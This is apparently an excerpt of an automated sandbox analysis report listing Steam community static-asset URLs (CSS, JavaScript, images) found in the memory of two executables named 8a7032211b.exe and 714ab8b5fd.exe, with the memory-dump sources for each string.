Source: 8a7032211b.exe, 0000001D.00000003.2822481060.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2992760742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2647791506.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2822616408.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3003866879.0000000001120000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2846601885.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2887258181.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2840218742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/(
Source: 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/pu
Source: 8a7032211b.exe, 0000001D.00000003.2822481060.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2992760742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2647791506.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2822616408.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3003866879.0000000001120000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2846601885.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2887258181.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2840218742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/publi
Source: 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=eVGzFA1_2smb&a
Source: 8a7032211b.exe, 0000001D.00000003.2822481060.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2992760742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2647791506.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2822616408.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3003866879.0000000001120000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2846601885.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2887258181.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2840218742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: 8a7032211b.exe, 0000001D.00000003.2822481060.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2992760742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2647791506.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2822616408.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3003866879.0000000001120000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2846601885.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2887258181.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2840218742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: 8a7032211b.exe, 0000001D.00000003.2822481060.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2992760742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2647791506.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2822616408.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3003866879.0000000001120000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2846601885.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2887258181.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2840218742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625940525.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.3170722424.00000000011AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 714ab8b5fd.exe, 00000021.00000002.3203098515.00000000011AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valveuh
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625940525.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 714ab8b5fd.exe, 00000021.00000003.3170722424.00000000011AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?5o
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625940525.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=gi31XL_w
Source: 714ab8b5fd.exe, 00000021.00000003.3170722424.00000000011AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifesEo
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625940525.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=F357
Source: 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625940525.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625969981.0000000001125000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: 8a7032211b.exe, 0000001D.00000003.2822481060.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2992760742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2647791506.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2822616408.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3003866879.0000000001120000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2846601885.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2887258181.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2840218742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalCont1
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=4djfoCdIn7bx&l=e
Source: 8a7032211b.exe, 0000001D.00000003.2822481060.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2992760742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2647791506.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2822616408.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3003866879.0000000001120000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2846601885.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2887258181.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2840218742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/
Source: 8a7032211b.exe, 0000001D.00000003.2822481060.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2992760742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2647791506.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2822616408.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3003866879.0000000001120000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2846601885.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2887258181.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2840218742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/cs
Source: 8a7032211b.exe, 0000001D.00000003.2822481060.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2992760742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2647791506.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2822616408.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3003866879.0000000001120000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2846601885.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2887258181.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2840218742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/butt
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
